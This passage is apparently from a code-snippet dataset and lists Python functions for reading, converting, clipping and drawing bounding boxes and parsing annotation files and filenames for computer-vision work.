elif \"\\n\" in annot:\n pass\n else:\n data = annot.split(\",\")\n \n signStatus = data[0] # signStatus\n signTypes = data[6] # signTypes\n signPurpose = data[5] # PROHIBITORY, WARNING, OTHER, INFORMATION\n tl_x, tl_y, br_x, br_y = data[3], data[4], data[1], data[2]\n \n if is_valid_decimal(tl_x):\n tl_x = float(tl_x)\n else:\n tl_x = float(cutoff_letter(tl_x))\n\n if is_valid_decimal(tl_y):\n tl_y = float(tl_y)\n else:\n tl_y = float(cutoff_letter(tl_y))\n\n if is_valid_decimal(br_x):\n br_x = float(br_x)\n else:\n br_x = float(cutoff_letter(br_x))\n\n if is_valid_decimal(br_y):\n br_y = float(br_y)\n else:\n br_y = float(cutoff_letter(br_y))\n\n if tl_x < 0:\n tl_x = 0\n elif tl_x > width:\n tl_x = width\n \n if tl_y < 0:\n tl_y = 0\n elif tl_y > height:\n tl_y = height\n \n if br_x < 0:\n br_x = 0\n elif br_x > width:\n br_x = width\n \n if br_y < 0:\n br_y = 0\n elif br_y > height:\n br_y = height\n\n signBB = (tl_x, tl_y, br_x, br_y)\n signC = (br_x + tl_x)/2, (br_y + tl_y)/2\n signSize = (br_x - tl_x) * (br_y - tl_y)\n aspectRatio = (br_x - tl_x) / (br_y - tl_y)\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n \n \n annot_dict[img_path] = bbox\n return annot_dict", "def bbox2fields():\n bbox2label = {\n 'gt_bboxes': 'gt_labels',\n 'gt_bboxes_ignore': 
'gt_labels_ignore'\n }\n bbox2mask = {\n 'gt_bboxes': 'gt_masks',\n 'gt_bboxes_ignore': 'gt_masks_ignore'\n }\n bbox2seg = {\n 'gt_bboxes': 'gt_semantic_seg',\n }\n return bbox2label, bbox2mask, bbox2seg", "def bbox(x):\n if ispoint(x):\n return pointbbox(x)\n elif isline(x):\n return linebbox(x)\n elif isarc(x):\n return arcbbox(x)\n elif ispoly(x):\n return polybbox(x)\n elif isgeomlist(x):\n return geomlistbbox(x)\n else:\n raise ValueError(\"inappropriate type for bbox(): \",format(x))", "def get_frame_bbox(annotations_dir, seq):\n root_dir = \"/home/sdb/wangshentao/myspace/thesis/data/VisDrone2019-MOT-test-dev/\"\n bbox = []\n frame_id = []\n trace_bbox = []\n trace_frame_id = []\n annotations_dir = root_dir + 'annotations/'\n gt_txt = os.path.join(annotations_dir, seq)\n gt = np.loadtxt(gt_txt, dtype=np.float64, delimiter=',')\n tid_last = gt[0][1]\n for fid, tid, x, y, w, h, mark, label, _, _ in gt:\n if int(mark) == 0 or int(label) == 0 or int(label) == 11:\n continue\n if tid == tid_last:\n trace_bbox.append([x, y, w, h])\n trace_frame_id.append(fid)\n else:\n tid_last = tid\n if len(trace_bbox) > 1:\n bbox.append(np.array(trace_bbox))\n frame_id.append(np.array(trace_frame_id))\n trace_bbox = [[x, y, w, h]]\n trace_frame_id = [fid]\n\n return bbox, frame_id", "def show_bounding_boxes(dir_path: str) -> None:\r\n \r\n for image_file in glob.glob(dir_path + '/*.png'):\r\n image = cv2.imread(image_file)\r\n height, width, _ = image.shape\r\n\r\n with open(image_file.split(\".\")[0] +'.txt', 'r') as reader:\r\n annotations = reader.readlines()\r\n for annot in annotations:\r\n annot = annot.split()\r\n \r\n # Calculation of top left point and bottom right point of the bounding box \r\n x1, y1 = int((float(annot[1]) - float(annot[3])/2)*width), int((float(annot[2]) - float(annot[4])/2)*height)\r\n x2, y2 = int((float(annot[1]) + float(annot[3])/2)*width), int((float(annot[2]) + float(annot[4])/2)*height)\r\n \r\n # BGR color format\r\n if annot[0] == '0':\r\n color = (0,255,0) # Mask is worn correctly (Green color)\r\n label = 'Good'\r\n else:\r\n color = (0,0,255) # Mask is either not worn correctly or not worn at all (Red color)\r\n label = 'Bad'\r\n \r\n cv2.putText(image,\r\n label, \r\n (x1, y1 - 10),\r\n fontFace=cv2.FONT_HERSHEY_TRIPLEX,\r\n fontScale=0.5, \r\n color=color,\r\n thickness=1) \r\n \r\n cv2.rectangle(image, (x1, y1), (x2, y2), color, thickness=1)\r\n \r\n k = cv2.waitKey(0) & 0xFF\r\n cv2.imshow(image_file.split(\"sss\")[-1], image)\r\n if k == 27:\r\n cv2.destroyAllWindows()\r\n break", "def bbox(img):\n a = np.where(img != 0)\n bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])\n return bbox", "def _decode_bbox(self, normalized_bbox):\n #apply the inverse of transformation\n y1,x1,y2,x2 = preprocess.apply_transformation(normalized_bbox,\n np.linalg.inv(self.transformation))\n\n w,h = self.image_size\n y1,x1,y2,x2 = y1*h,x1*w,y2*h,x2*w\n return vot.Rectangle(x1,y1,x2-x1,y2-y1)", "def get_bbox(self):\n dimsizes = self.get_full_dimensions('lon').values()\n slices = [slice(None, None, dimsizes[0] - 1),\n slice(None, None, dimsizes[1] - 1)]\n lon = self.read_values('lon', slices=slices)\n lat = self.read_values('lat', slices=slices)\n return (lon.min(), lat.min(), lon.max(), lat.max())", "def bbox_format(self) -> bbox_utils.BBoxFormat:\n raise NotImplementedError", "def gt_multi_txt(path, bboxes): \n \n W, H = Image.open(path).size\n\n lines_out=[]\n for obj_info in bboxes:\n label = 0 #obj_info['name']\n xmin, ymin, xmax, ymax = obj_info['bbox']\n\n cx = 
'%.3f' % np.clip(((xmax+xmin)/2)/W,0,1)\n cy = '%.3f' % np.clip(((ymax+ymin)/2)/H,0,1)\n w = '%.3f' % np.clip((xmax-xmin)/W ,0,1)\n h = '%.3f' % np.clip((ymax-ymin)/H ,0,1)\n\n lines_out.append(' '.join([str(label),cx,cy,w,h,'\\n']))\n\n return lines_out", "def bbox_size(label_sitk):\n\n # Setting Bounding Box\n F_statistics = sitk.LabelShapeStatisticsImageFilter()\n\n F_statistics.Execute(label_sitk)\n bbox_dims = F_statistics.GetBoundingBox(1)\n return list(bbox_dims[3:6])", "def get_bb(self,bbname, mol = False):\n lines = self.mfp.get_bb(bbname)\n return lines", "def getBoundingBoxes(directory,\n bbFormat,\n coordType,\n isGT=False,\n allBoundingBoxes=None,\n allClasses=None,\n imgSize=(0, 0),\n header=True):\n if allBoundingBoxes is None:\n allBoundingBoxes = BoundingBoxes()\n if allClasses is None:\n allClasses = []\n # Read ground truths\n os.chdir(directory)\n files = glob.glob(\"*.txt\")\n files.sort()\n # Read GT detections from txt file\n # Each line of the files in the groundtruths folder represents a ground truth bounding box\n # (bounding boxes that a detector should detect)\n # Each value of each line is \"class_id, x, y, width, height\" respectively\n # Class_id represents the class of the bounding box\n # x, y represents the most top-left coordinates of the bounding box\n # x2, y2 represents the most bottom-right coordinates of the bounding box\n for f in files:\n nameOfImage = f.replace(\".txt\", \"\")\n fh1 = open(f, \"r\")\n\n if header is True:\n header_line = fh1.readline()\n header_split = header_line.split(';')\n assert len(header_split) > 0\n try:\n height = header_split[0].split(':')[-1]\n width = header_split[1].split(':')[-1]\n except IndexError as e:\n logger.error('error for header split of {} in {}: {}'.format(f, directory, header_split))\n raise\n imgSize = (width, height)\n\n for line in fh1:\n line = line.replace(\"\\n\", \"\")\n if line.replace(' ', '') == '':\n continue\n splitLine = line.split(\" \")\n if isGT:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n x = float(splitLine[2])\n y = float(splitLine[3])\n w = float(splitLine[4])\n h = float(splitLine[5])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.GroundTruth,\n format=bbFormat,\n bbox_id=ann_id)\n else:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n confidence = float(splitLine[2])\n x = float(splitLine[3])\n y = float(splitLine[4])\n w = float(splitLine[5])\n h = float(splitLine[6])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.Detected,\n confidence,\n format=bbFormat,\n bbox_id=ann_id)\n allBoundingBoxes.addBoundingBox(bb)\n if idClass not in allClasses:\n allClasses.append(idClass)\n fh1.close()\n return allBoundingBoxes, allClasses", "def split_filename(path):\n filename = os.path.basename(path)\n name, extension = os.path.splitext(filename)\n region = name.split('.')[0]\n\n return region, name, extension", "def bnd_info(self):\n if self._bnd_info is None:\n if self.boundary_file is not None:\n self._bnd_info = self.get_bnd_value()\n else:\n raise TelemacException(\\\n \"Can not read bnd_info no boundary file was given\")\n\n return self._bnd_info", "def get_document_bounds(image_file, feature):\n # client = vision.ImageAnnotatorClient()\n\n bounds = []\n\n\n# No need for this .... 
\n # with io.open(image_file, 'rb') as image_file:\n # content = image_file.read()\n\n # image = types.Image(content=content)\n\n # response = client.document_text_detection(image=image)\n # document = response.full_text_annotation\n\n # with open('8130processed.json', 'w') as outfile:\n # outfile.write(MessageToJson(response))\n\n\n# We already have the document bounds of the image inside of 8130processed.json no\n\n f = open ('processed_8130-1output-1-to-1.json', \"r\")\n data = json.load(f)\n datas=json.dumps(data)\n # print(data)\n\n response = json_format.Parse(datas, vision.types.AnnotateFileResponse())\n # print(response)\n document = response.inputConfig\n # Collect specified feature bounds by enumerating all document features\n for page in document.pages:\n for block in page.blocks:\n for paragraph in block.paragraphs:\n for word in paragraph.words:\n for symbol in word.symbols:\n if (feature == FeatureType.SYMBOL):\n bounds.append(symbol.bounding_box)\n\n if (feature == FeatureType.WORD):\n bounds.append(word.bounding_box)\n\n if (feature == FeatureType.PARA):\n bounds.append(paragraph.bounding_box)\n\n if (feature == FeatureType.BLOCK):\n bounds.append(block.bounding_box)\n\n # The list `bounds` contains the coordinates of the bounding boxes.\n return bounds", "def get_boxes_for_id(voc_path, image_id):\n fname = os.path.join(voc_path, 'obj/{}.txt'.format(image_id))\n\n boxes = []\n with open(fname) as txt_file:\n for line in txt_file.readlines():\n if(len(line) < 1):\n continue\n try:\n elems = line.split(' ')\n bbox = [\n float(elems[1]),\n float(elems[2]),\n float(elems[3]),\n float(elems[4]),\n int(elems[0]),\n ]\n boxes.append(bbox)\n except:\n \"problem with get boxes from file: \" + str(fname) \n \n\n return np.array(boxes)", "def bbox_json_parse(json_path: str):\n labels = []\n bboxes = []\n with open(json_path) as json_file:\n json_data = json.load(json_file)\n for bbox in json_data:\n # assert bbox['train_id'] < 255, f\"invalid id {bbox['train_id']}\"\n if bbox['train_id'] < 19:\n labels.append(bbox['train_id'])\n bboxes.append(bbox['bbox'])\n\n return labels, bboxes", "def parseFilename(self, filename):\r\n match = self.filename_regex.match(filename)\r\n if match is None:\r\n # TODO?: Raise exception?\r\n '''print \"Filename\", filename, \"unrecognized!\"'''\r\n return None\r\n lat = int(match.group(2))\r\n lon = int(match.group(4))\r\n if match.group(1) == \"S\":\r\n lat = -lat\r\n if match.group(3) == \"W\":\r\n lon = -lon\r\n return lat, lon", "def choose_mask(self, bboxFile):\n f = open(bboxFile, 'r')\n content = f.read().split('\\n')\n ind = np.random.randint(len(content) - 1)\n line = content[ind]\n words = line.split(',')\n\n maskFile = words[0]\n maskCoord = []\n\n for item in words[1:]:\n item = util.strip_paren(item)\n item = item.lstrip().rstrip()\n maskCoord.append(item)\n\n f.close()\n\n return maskFile, maskCoord", "def bbox(self, image_coords=False):\n matrix = self.contours_to_matrix()\n bbox = np.c_[matrix.min(axis=0), matrix.max(axis=0)]\n return bbox if not image_coords else bbox[[1,0,2]]", "def _get_info_from_filename(filename: str) -> dict:\n *parts, suffix = filename.split('.')\n dct = re.match(r'^(?P<name>[A-z0-9.]*)(-(?P<num_rows>[0-9]+))?$', '.'.join(parts)).groupdict()\n return {\n 'name': dct['name'],\n 'num_rows': int(dct['num_rows']) if dct['num_rows'] else None,\n 'format': suffix,\n }", "def return_bbox_image(self, image, bboxes, label, color):\n if bboxes:\n for obj in bboxes:\n image = self.draw_single_bbox(image, obj.position_xywh, 
label=label, color=color)\n\n return image", "def read_image(image_path):\n\n image_path = LOCAL_ROOT + image_path\n\n img = cv2.imread(image_path)\n # Get the shape of input image\n real_h,real_w,c = img.shape\n assert os.path.exists(image_path[:-4] + '_bb.txt'),'path not exists' + ' ' + image_path\n \n with open(image_path[:-4] + '_bb.txt','r') as f:\n material = f.readline()\n try:\n x,y,w,h,score = material.strip().split(' ')\n except:\n logging.info('Bounding Box of' + ' ' + image_path + ' ' + 'is wrong') \n\n try:\n w = int(float(w))\n h = int(float(h))\n x = int(float(x))\n y = int(float(y))\n w = int(w*(real_w / 224))\n h = int(h*(real_h / 224))\n x = int(x*(real_w / 224))\n y = int(y*(real_h / 224))\n\n # Crop face based on its bounding box\n y1 = 0 if y < 0 else y\n x1 = 0 if x < 0 else x \n y2 = real_h if y1 + h > real_h else y + h\n x2 = real_w if x1 + w > real_w else x + w\n img = img[y1:y2,x1:x2,:]\n\n except:\n logging.info('Cropping Bounding Box of' + ' ' + image_path + ' ' + 'goes wrong') \n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img", "def get_label_info(xml_name):\n tar_path = os.path.join(get_data_dir(), 'atlas')\n label_list = get_info(os.path.join(tar_path, xml_name), 'label')\n return label_list", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == \"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == \"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def get_contour_bbox_from_raw(raw_mask):\n cnts = grab_contours(\n cv2.findContours(\n raw_mask, \n cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE\n ))\n xywhs = [cv2.boundingRect(cnt) for cnt in cnts]\n xys = [(xywh[0], xywh[1], xywh[0]+xywh[2], xywh[1]+xywh[3]) for xywh in xywhs]\n return sorted(xys, key=lambda x: (x[1], x[0]))", "def get_detection_bboxes(detector):\r\n with open('../datasets/AICity_data/train/S03/c010/det/det_' + detector + '.txt') as f:\r\n lines = f.readlines()\r\n bboxes = dict()\r\n num_of_instances = 0\r\n for line in lines:\r\n num_of_instances += 1\r\n line = (line.split(','))\r\n if line[0] in bboxes.keys():\r\n content = [int(float(elem)) for elem in line[1:6]]\r\n content.append(float(line[6])) # confidence score??????\r\n bboxes[line[0]].append(content)\r\n else:\r\n content = [int(float(elem)) for elem in line[1:6]]\r\n content.append(float(line[6]))\r\n bboxes[line[0]] = [content]\r\n return bboxes, num_of_instances", "def crop_inference_bbox(image, boxes, file_name=\"cropped_inference_result\"):\n # create output folder if not present\n create_dir(\"output/\")\n # crop detections\n if len(boxes) > 0:\n for ind in range(len(boxes)):\n cropped_img = image[\n int(boxes[ind][0][1]) : 
int(boxes[ind][1][1]),\n int(boxes[ind][0][0]) : int(boxes[ind][1][0]),\n :,\n ]\n save_path = os.path.join(\"output/\", file_name + \"_\" + str(ind) + \".png\")\n cv2.imwrite(save_path, cv2.cvtColor(cropped_img, cv2.COLOR_RGB2BGR))", "def get_bnd_info(self):\n nbor = self.nbor\n lihbor, liubor, livbor, _, _, _, _, \\\n litbor, _, _, _, _ = self.bnd_info\n\n return (nbor, lihbor, liubor, livbor, litbor)", "def get_bounding_box(current_building_contour):\n x, y, w, h, = cv.boundingRect(current_building_contour[0])\n return x, y, w, h", "def __read_img_file(filename, label):\n image = cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2RGB)\n height, width, _ = image.shape\n image = cv2.resize(image, (img_size, img_size))\n # A label is consist of [y1, x1, y2, x2, class_idx]\n label = np.reshape(label, (-1, 5))\n rel_bboxes = label[..., 0:4] / np.array([height, width, height, width], np.float32)\n label = np.concatenate([rel_bboxes, np.expand_dims(label[..., -1], 1)], axis=-1)\n return image, label", "def getFeaturesByBBox(self,bboxtuple, srsname):\n raise NotImplementedError", "def unpack_box(self, idx, struct):\r\n\r\n attributes = ['label', 'height', 'width', 'top', 'left']\r\n\r\n # Instantiate metadata dict for each image\r\n metadata = {attr: [] for attr in attributes}\r\n\r\n # This function retreives each data point corresponding to a bounding box\r\n def get_attrs(attr, obj):\r\n vals = []\r\n if obj.shape[0] == 1:\r\n vals.append(int(obj[0][0]))\r\n else:\r\n for k in range(obj.shape[0]):\r\n vals.append(int(struct[obj[k][0]][0][0]))\r\n\r\n metadata[attr] = vals\r\n\r\n # Get bounding box metadata for an image\r\n box = struct['/digitStruct/bbox'][idx]\r\n struct[box[0]].visititems(get_attrs)\r\n\r\n return metadata", "def get_bbox(self):\n z2p = 64 # zoomFactor to bbox radius in pixels @ MIP0\n pos = Vec(*self.get_position())\n zoom = self.get_zoom()\n return Bbox(pos-Vec(z2p*zoom, z2p*zoom, 0), \n pos+Vec(z2p*zoom, z2p*zoom, 1))", "def fix_bbox(bbox,img_shape):\n x = min(bbox[1][0],img_shape[1])\n y = min(bbox[1][1],img_shape[0])\n return ((bbox[0]),(x,y))", "def get_bbox(frame_data, camera_image_data):\n object_decodification = {0: 'unkown', 1: 'vehicle', 2: 'pedestrian', 3: 'sign', 4: 'cyclist'}\n bbox = {}\n valid_bb_data = True\n if not frame_data.camera_labels:\n valid_bb_data = False\n # Draw the camera labels.\n for camera_labels in frame_data.camera_labels:\n # Ignore camera labels from other views (i.e. 
I want Front but it also gives left, right, front left, ...)\n if camera_labels.name != camera_image_data.name:\n continue\n # Iterate over the individual labels\n for label in camera_labels.labels:\n if label.detection_difficulty_level == 0:\n difficulty = \"easy\"\n elif label.detection_difficulty_level == 2:\n difficulty = \"hard\"\n\n if label.tracking_difficulty_level == 0:\n tracking_level = \"easy\"\n elif label.tracking_difficulty_level == 2:\n tracking_level = 'hard'\n\n object_class = object_decodification[label.type]\n # I'm not saving the other labels so that it matches my CARLA dataset\n if object_class not in bbox and (object_class == \"vehicle\" or object_class == \"pedestrian\"):\n bbox[object_class] = []\n \n if (object_class == \"vehicle\" or object_class == \"pedestrian\"):\n # Get BB\n xmin = int(label.box.center_x - 0.5 * label.box.length)\n ymin = int(label.box.center_y - 0.5 * label.box.width)\n xmax = int(xmin + label.box.length)\n ymax = int(ymin + label.box.width)\n bbox[object_class].append([xmin, ymin, xmax, ymax, difficulty, tracking_level])\n return bbox, valid_bb_data", "def getElementName(self):\n return _libsbml.BoundingBox_getElementName(self)", "def get_boundingbox(face, width, height, scale=1.3, minsize=None):\n x1 = face.left()\n y1 = face.top()\n x2 = face.right()\n y2 = face.bottom()\n size_bb = int(max(x2 - x1, y2 - y1) * scale)\n if minsize:\n if size_bb < minsize:\n size_bb = minsize\n center_x, center_y = (x1 + x2) // 2, (y1 + y2) // 2\n\n # Check for out of bounds, x-y top left corner\n x1 = max(int(center_x - size_bb // 2), 0)\n y1 = max(int(center_y - size_bb // 2), 0)\n # Check for too big bb size for given x, y\n size_bb = min(width - x1, size_bb)\n size_bb = min(height - y1, size_bb)\n\n return x1, y1, size_bb", "def get_bb(node_name):\n return int(re.search(r'\\d+', re.search(r'block_\\d+', node_name).group()).group())", "def parse_file_name(filename):\n import re\n rgx = r'bin_thresh_([0-9]+).*n_bins_([0-9]+)'\n m = re.search(rgx, filename)\n if m:\n logging.debug('Matching \\'{}\\' to \\'{}\\' worked: {}'.format(rgx, filename, m.groups()))\n return [int(m.group(i)) for i in [1,2]]\n\n logging.warning('Could not match \\'{}\\' to \\'{}\\''.format(rgx, filename))\n return -1,-1", "def _sourceBoundingBox(self, source, width, height):\n pos = source.get('position')\n bbox = {'left': 0, 'top': 0, 'right': width, 'bottom': height}\n if not pos:\n return bbox\n x0, y0, x1, y1 = 0, 0, width, height\n if 'crop' in pos:\n x0 = min(max(pos['crop'].get('left', x0), 0), width)\n y0 = min(max(pos['crop'].get('top', y0), 0), height)\n x1 = min(max(pos['crop'].get('right', x1), x0), width)\n y1 = min(max(pos['crop'].get('bottom', y1), y0), height)\n bbox['crop'] = {'left': x0, 'top': y0, 'right': x1, 'bottom': y1}\n corners = np.array([[x0, y0, 1], [x1, y0, 1], [x0, y1, 1], [x1, y1, 1]])\n m = np.identity(3)\n m[0][0] = pos.get('s11', 1) * pos.get('scale', 1)\n m[0][1] = pos.get('s12', 0) * pos.get('scale', 1)\n m[0][2] = pos.get('x', 0)\n m[1][0] = pos.get('s21', 0) * pos.get('scale', 1)\n m[1][1] = pos.get('s22', 1) * pos.get('scale', 1)\n m[1][2] = pos.get('y', 0)\n if not np.array_equal(m, np.identity(3)):\n bbox['transform'] = m\n try:\n bbox['inverse'] = np.linalg.inv(m)\n except np.linalg.LinAlgError:\n msg = 'The position for a source is not invertable (%r)'\n raise TileSourceError(msg, pos)\n transcorners = np.dot(m, corners.T)\n bbox['left'] = min(transcorners[0])\n bbox['top'] = min(transcorners[1])\n bbox['right'] = max(transcorners[0])\n 
bbox['bottom'] = max(transcorners[1])\n return bbox", "def get_path_bounding_box(self, image) -> BoundingBox:\n return NNManager.get_yolo_model(\"path\").predict(image)", "def get_bbox(self):\n return (self.get_handler().PROCESSING_LIMIT_WEST,\n self.get_handler().PROCESSING_LIMIT_SOUTH,\n self.get_handler().PROCESSING_LIMIT_EAST,\n self.get_handler().PROCESSING_LIMIT_NORTH\n )", "def read_binning_file(file_name, lmax):\n\n bin_lo,bin_hi,bin_c = plt.loadtxt(file_name,unpack=True)\n id = np.where(bin_hi <lmax)\n bin_lo,bin_hi,bin_c=bin_lo[id],bin_hi[id],bin_c[id]\n if bin_lo[0]<2:\n bin_lo[0]=2\n bin_hi=bin_hi.astype(np.int)\n bin_lo=bin_lo.astype(np.int)\n bin_size=bin_hi-bin_lo+1\n return (bin_lo,bin_hi,bin_c,bin_size)", "def unpack_annotation(path):\n buffer = []\n with open(path, 'r') as file:\n lines = file.read()\n\n lines = lines.splitlines()\n for line in lines:\n if not line.startswith('#') and line:\n buffer.append(line)\n\n # Filename to match annotation with photo\n filename = ''\n for line in buffer:\n if 'Image filename' in line:\n filename = line.replace(' ', '').split(':')[1]\n\n # How many person-like objects in photo\n how_many = 0\n for line in buffer:\n if 'Objects with ground truth' in line:\n how_many = int((line.replace(' ', '').split(':')[1][0]))\n break\n\n person_id = []\n for i in range(how_many):\n person_id.append(f'{i+1} \"PASperson\"')\n\n # Centers of objects\n centers = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (X, Y)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split(',')\n centers.append((int(buf[0]), int(buf[1])))\n which_one += 1\n\n # Bounding boxes of objects\n boxes = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (Xmin, Ymin)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split('-')\n buf0 = buf[0].split(',')\n buf1 = buf[1].split(',')\n boxes.append((int(buf0[0]), int(buf0[1]), int(buf1[0]), int(buf1[1])))\n which_one += 1\n\n return filename, how_many, centers, boxes", "def parse_labelbox_boxes(IMAGE_PATH, ANNOTATION_FILEPATH, CLASS_NAMES):\n IMAGE_PATH = make_abs_path(IMAGE_PATH)\n annotation_data = json.loads(open(ANNOTATION_FILEPATH).read())\n images = []\n boxes = {name:[] for name in CLASS_NAMES}\n for image_data in annotation_data:\n image_file = image_data.get('External ID')\n images.append(io.imread(IMAGE_PATH + image_file))\n image_boxes = {name: [] for name in CLASS_NAMES}\n for obj in image_data.get(\"Label\",{}).get(\"objects\",[]):\n object_name = obj.get('title','').lower()\n if object_name not in CLASS_NAMES:\n continue\n label_box = obj.get('bbox',{})\n image_boxes[object_name].append(\n dlib.rectangle(left=long(label_box.get(\"left\")), top=long(label_box.get(\"top\")), right=long(label_box.get(\"width\")), bottom=long(label_box.get(\"height\")))\n )\n for class_name in CLASS_NAMES:\n boxes[class_name].append(image_boxes[class_name])\n\n return images, boxes", "def parseFilename(fileName):\n # regex to match names like Axis-BaldCA_2018-05-29T16_02_30_129496.jpg\n # and bm-n-mobo-c__2017-06-25z11;53;33.jpg\n regexExpanded = '([A-Za-z0-9-_]+[^_])_+(\\d{4}-\\d\\d-\\d\\d)T(\\d\\d)[_;](\\d\\d)[_;](\\d\\d)'\n # regex to match diff minutes spec for subtracted images\n regexDiff = '(_Diff(\\d+))?'\n # regex to match optional crop information e.g., 
Axis-Cowles_2019-02-19T16;23;49_Crop_270x521x569x820.jpg\n regexOptionalCrop = '(_Crop_(-?\\d+)x(-?\\d+)x(\\d+)x(\\d+))?'\n matchesExp = re.findall(regexExpanded + regexDiff + regexOptionalCrop, fileName)\n # regex to match names like 1499546263.jpg\n regexUnixTime = '(1\\d{9})'\n matchesUnix = re.findall(regexUnixTime + regexDiff + regexOptionalCrop, fileName)\n cropInfo = None\n if len(matchesExp) == 1:\n match = matchesExp[0]\n parsed = {\n 'cameraID': match[0],\n 'date': match[1],\n 'hours': match[2],\n 'minutes': match[3],\n 'seconds': match[4]\n }\n isoStr = '{date}T{hour}:{min}:{sec}'.format(date=parsed['date'],hour=parsed['hours'],min=parsed['minutes'],sec=parsed['seconds'])\n dt = dateutil.parser.parse(isoStr)\n unixTime = int(dt.timestamp())\n parsed['diffMinutes'] = int(match[6] or 0)\n cropInfo = match[-4:]\n elif len(matchesUnix) == 1:\n match = matchesUnix[0]\n unixTime = int(match[0])\n dt = datetime.datetime.fromtimestamp(unixTime)\n isoStr = datetime.datetime.fromtimestamp(unixTime).isoformat()\n parsed = {\n 'cameraID': 'UNKNOWN_' + fileName,\n 'date': dt.date().isoformat(),\n 'hours': str(dt.hour),\n 'minutes': str(dt.minute),\n 'seconds': str(dt.second)\n }\n parsed['diffMinutes'] = int(match[2] or 0)\n cropInfo = match[-4:]\n else:\n logging.error('Failed to parse name %s', fileName)\n return None\n if cropInfo[0]:\n parsed['minX'] = int(cropInfo[0])\n parsed['minY'] = int(cropInfo[1])\n parsed['maxX'] = int(cropInfo[2])\n parsed['maxY'] = int(cropInfo[3])\n parsed['isoStr'] = isoStr\n parsed['unixTime'] = int(unixTime)\n return parsed", "def repackFileName(parsedName):\n cropCoords = None\n if 'minX' in parsedName:\n cropCoords=(parsedName['minX'], parsedName['minY'], parsedName['maxX'], parsedName['maxY'])\n return getImgPath('', parsedName['cameraID'], parsedName['unixTime'],\n cropCoords=cropCoords,\n diffMinutes=parsedName['diffMinutes'])", "def getBoundingBox(shp):\r\n if not isinstance(shp, geopandas.geodataframe.GeoDataFrame):\r\n shp = geopandas.read_file(shp)\r\n xmin = shp.bounds['minx'][0]\r\n xmax = shp.bounds['maxx'][0]\r\n ymin = shp.bounds['miny'][0]\r\n ymax = shp.bounds['maxy'][0]\r\n\r\n return [xmin, ymin, xmax, ymax]", "def optimize_bbox(img_shape,\n bbox,\n edge_width=8):\n (rows,columns) = img_shape\n (x1,y1,x2,y2) = bbox\n\n return max(0,x1-edge_width),max(0,y1-edge_width),min(rows-1,x2+edge_width),min(columns-1,y2+edge_width)", "def bbox(self, obj):\n return self.phy2abs.bbox(obj)", "def bbox(self):\n return self._bbox", "def get_bbox(x,y, buffer=0.):\n return dict(left=np.min(x), \n right=np.max(x), \n bottom=np.min(y), \n top=np.max(y))", "def bbox_from_openpose(openpose_file, rescale=1.2, detection_thresh=0.2):\n with open(openpose_file, 'r') as f:\n keypoints = json.load(f)['people'][0]['pose_keypoints_2d']\n keypoints = np.reshape(np.array(keypoints), (-1,3))\n valid = keypoints[:,-1] > detection_thresh\n valid_keypoints = keypoints[valid][:,:-1]\n center = valid_keypoints.mean(axis=0)\n bbox_size = (valid_keypoints.max(axis=0) - valid_keypoints.min(axis=0)).max()\n # adjust bounding box tightness\n scale = bbox_size / 200.0\n scale *= rescale\n return center, scale", "def bbox_from_openpose(openpose_file, rescale=1.2, detection_thresh=0.2):\n with open(openpose_file, 'r') as f:\n keypoints = json.load(f)['people'][0]['pose_keypoints_2d']\n keypoints = np.reshape(np.array(keypoints), (-1,3))\n valid = keypoints[:,-1] > detection_thresh\n valid_keypoints = keypoints[valid][:,:-1]\n center = valid_keypoints.mean(axis=0)\n bbox_size = 
(valid_keypoints.max(axis=0) - valid_keypoints.min(axis=0)).max()\n # adjust bounding box tightness\n scale = bbox_size / 200.0\n scale *= rescale\n return center, scale", "def boundingRect(cnt):\n\tx, y, w, h = cv2.boundingRect(cnt)\n\treturn {\"x\":x, \"y\": y, \"w\": w, \"h\": h}", "def extract_name(text):\n name = re.sub(r\"<br>\", \"\", text)\n name = re.sub(r\"\\(\\d\\.\\d\\)\", \"\", name)\n return name" ]
